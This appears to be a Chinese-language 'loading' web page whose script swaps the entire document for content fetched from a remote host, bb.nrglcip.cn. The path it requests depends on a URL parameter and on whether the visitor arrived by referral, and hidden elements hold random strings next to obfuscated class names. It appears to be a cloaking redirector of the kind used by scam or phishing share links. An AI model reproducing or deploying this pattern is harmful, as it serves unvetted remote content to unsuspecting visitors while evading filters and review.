<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .BVTbmHvTZQl {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .BVTbmHvTZQl .XTzBKOs {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .BVTbmHvTZQl .content {
            line-height: 50px;
            text-align: center
        }

        .BVTbmHvTZQl .img {
            width: 100%
        }

        .BVTbmHvTZQl .yZpkU4sYoNy {
            text-align: center
        }

        .BVTbmHvTZQl .yZpkU4sYoNy span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .BVTbmHvTZQl .yZpkU4sYoNy span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .BVTbmHvTZQl .yZpkU4sYoNy span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .BVTbmHvTZQl .yZpkU4sYoNy span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .BVTbmHvTZQl .yZpkU4sYoNy span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .BVTbmHvTZQl .yZpkU4sYoNy span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .BVTbmHvTZQl .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function UQUePvVTM7PRY(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var QJLgtbE = UQUePvVTM7PRY('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ QJLgtbE +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ QJLgtbE +".html?a=share";
		}
		
        vFJAL932=url+"#"+new Date().getTime();
        vFJAL932 && function() {
            $.get(vFJAL932, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<li style='display:none' >LZuwQdXPZVO9HfB</li>
<a  href='#' style='display:none'>a3v7rtlR2HAq0xCT09</a>
<li style='display:none' >LZuwQdXPZVO9HfB</li><div class="BVTbmHvTZQl">
    <div class="XTzBKOs">
        <div class="yZpkU4sYoNy">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<h1 style='display:none' >JIqbachsEwGSxkUHx0ufG8EUkbw6nMbOWL</h1>
<p  style='display:none'>HDu3BXbYOu7yPCpdPr6yAXzykMpC3X9RR1t9Gf</p>
<b style='display:none' >M5qjy7cwRO4CPH</b>
<div style='display:none'>sjFv4pPbu67uJxrWcmyycQJha5aUklmLLDZMkxtV3jguQyQium0O8gHfgNn7wv2Ye05uoblcUhhzB4TZfc9VdtkIEP</div>
<p  style='display:none'>HDu3BXbYOu7yPCpdPr6yAXzykMpC3X9RR1t9Gf</p>
<h1 style='display:none' >JIqbachsEwGSxkUHx0ufG8EUkbw6nMbOWL</h1></body>
</html>